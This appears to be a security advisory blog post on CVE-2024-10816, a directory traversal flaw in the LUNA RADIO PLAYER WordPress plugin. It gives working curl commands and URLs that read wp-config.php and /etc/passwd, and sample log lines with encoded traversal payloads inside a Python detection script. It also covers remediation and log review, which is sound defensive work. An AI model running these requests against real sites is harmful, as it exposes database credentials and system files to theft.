In early 2024, a serious security vulnerability (CVE-2024-10816) was discovered in the LUNA RADIO PLAYER plugin for WordPress. This bug affects all versions up to and including 6.24.01.24, threatening the integrity and security of millions of WordPress websites using this plugin. This deep-dive post will explain in simple terms what the bug is, how it can be exploited, and how you can protect your site.
What’s The Problem?
LUNA RADIO PLAYER lets website owners easily embed internet radio stations on their WordPress sites. However, the plugin’s file js/fallback.php does not properly protect against "directory traversal," a trick attackers use to read sensitive files on a server that they shouldn’t have access to.
Vulnerability in short:
- Through a specially crafted URL, anyone on the internet can read any file on your web server, including sensitive ones like your WordPress configuration file.
- No authentication needed — attackers do not need to log in or register to exploit this flaw.
- Potential data exposure — critical files like wp-config.php (holding DB passwords and keys) can be accessed and stolen.
How Does Directory Traversal Work?
Web servers store files in folders ("directories"). Most plugins restrict what files you can ask for. But directory traversal lets attackers use special characters — like ../ — to "climb" outside the intended folder and read system files.
File Affected
- Path: wp-content/plugins/luna-radio-player/js/fallback.php
Example of Exploitation
Suppose your website is:
https://yourwebsite.com
The attacker can access any file (if file permissions allow), like the WordPress configuration file, using a URL pattern like this:
https://yourwebsite.com/wp-content/plugins/luna-radio-player/js/fallback.php?file=../../../wp-config.php
The file parameter is directly controlled by whoever crafts the URL. By adding multiple ../, attackers can navigate outside the plugin directory and grab files elsewhere on the server.
Sample Exploitation Code (Using Curl)
curl "https://yourwebsite.com/wp-content/plugins/luna-radio-player/js/fallback.php?file=../../../wp-config.php"
If the site is vulnerable, you’ll receive the contents of wp-config.php directly in your terminal!
Official References
- WordFence Advisory
- WPScan Entry
Example: Reading /etc/passwd
curl "https://yourwebsite.com/wp-content/plugins/luna-radio-player/js/fallback.php?file=../../../../../../etc/passwd"
If successful, you’ll see the contents of the Linux server’s user accounts file.
How To Fix Or Prevent This?
1. Update the Plugin:
The LUNA RADIO PLAYER plugin developers should release a fixed version. Check the plugin page on WordPress.org for updates, and always keep your plugins current.
2. Disable or Remove the Plugin:
If no fix is available, disable the plugin until an update is released.
3. Restrict Direct Access:
Use an .htaccess rule or similar web server setting to deny direct HTTP access to fallback.php. This only blocks requests arriving over HTTP; server-side PHP includes of the file are unaffected. Note that the Require syntax below is for Apache 2.4, that a <Files> block placed in the site-root .htaccess applies to every file named fallback.php under that directory tree, and that if the plugin's front end loads fallback.php from the browser, blocking it may break the player's fallback behavior, so test the site afterwards.
Example for Apache
<Files "fallback.php">
Require all denied
</Files>
What Should I Do Now?
- Scan your website with security plugins like Wordfence or WPScan.
- Set strong database credentials and rotate them if you suspect exposure.
- Consider using the WP hardening guide for added protection.
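To help with the "review your site for signs of intrusion" step, here is an added example (not code from the original post or from the plugin) that scans Apache access-log lines for requests to fallback.php whose file parameter, once fully URL-decoded, resolves outside the plugin's js directory. The log lines and client IPs are constructed for the example; the plugin path is the one given above.

```python
import re
import posixpath
from urllib.parse import unquote, urlsplit, parse_qs

# Constructed Apache combined-format lines (TEST-NET addresses, not real clients).
SAMPLE_LOG = """\
203.0.113.7 - - [13/Nov/2024:04:20:11 +0000] "GET /wp-content/plugins/luna-radio-player/js/fallback.php?file=../../../wp-config.php HTTP/1.1" 200 3125 "-" "curl/8.4.0"
203.0.113.7 - - [13/Nov/2024:04:20:15 +0000] "GET /wp-content/plugins/luna-radio-player/js/fallback.php?file=..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd HTTP/1.1" 200 1804 "-" "curl/8.4.0"
198.51.100.9 - - [13/Nov/2024:04:21:02 +0000] "GET /wp-content/plugins/luna-radio-player/js/fallback.php?file=player.js HTTP/1.1" 200 9120 "-" "Mozilla/5.0"
198.51.100.9 - - [13/Nov/2024:04:21:05 +0000] "GET /index.php HTTP/1.1" 200 51200 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Directory the vulnerable script lives in (path taken from the advisory text).
PLUGIN_JS_DIR = "/wp-content/plugins/luna-radio-player/js"


def fully_decode(value: str, rounds: int = 3) -> str:
    """Undo percent-encoding repeatedly so double-encoded '%252F' is seen as '/'."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def escapes_plugin_dir(file_param: str) -> bool:
    """True when the decoded file parameter normalizes to a path outside PLUGIN_JS_DIR."""
    candidate = fully_decode(file_param).replace("\\", "/")
    resolved = posixpath.normpath(posixpath.join(PLUGIN_JS_DIR, candidate))
    return not resolved.startswith(PLUGIN_JS_DIR + "/")


def find_traversal_attempts(log_text: str) -> list:
    """Return one record per fallback.php request whose file parameter escapes the js directory."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m["target"])
        if not parts.path.endswith("/fallback.php"):
            continue
        for value in parse_qs(parts.query).get("file", []):  # parse_qs decodes one layer
            if escapes_plugin_dir(value):
                hits.append({"ip": m["ip"], "ts": m["ts"], "status": int(m["status"]),
                             "file": fully_decode(value)})
    return hits
```

A hit with HTTP status 200 means the server returned something for a traversal request, which is the strongest indicator that the file contents were actually disclosed.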
Final Notes
The LUNA RADIO PLAYER plugin’s directory traversal vulnerability (CVE-2024-10816) is critical. It’s easy for hackers to use, requires zero authentication, and can expose your most sensitive files. If you use this plugin — or manage WordPress sites for others — act urgently to update, disable, or patch LUNA RADIO PLAYER and review your site for signs of intrusion.
Stay informed:
- National Vulnerability Database: CVE-2024-10816
- OWASP Directory Traversal
Got questions? Leave a comment below or check with your web hosting support for emergency help.
Remember: The weakest plugin can endanger your whole site. Always update, audit, and stay secure!
Timeline
Published on: 11/13/2024 04:15:04 UTC
Last modified on: 11/13/2024 17:01:16 UTC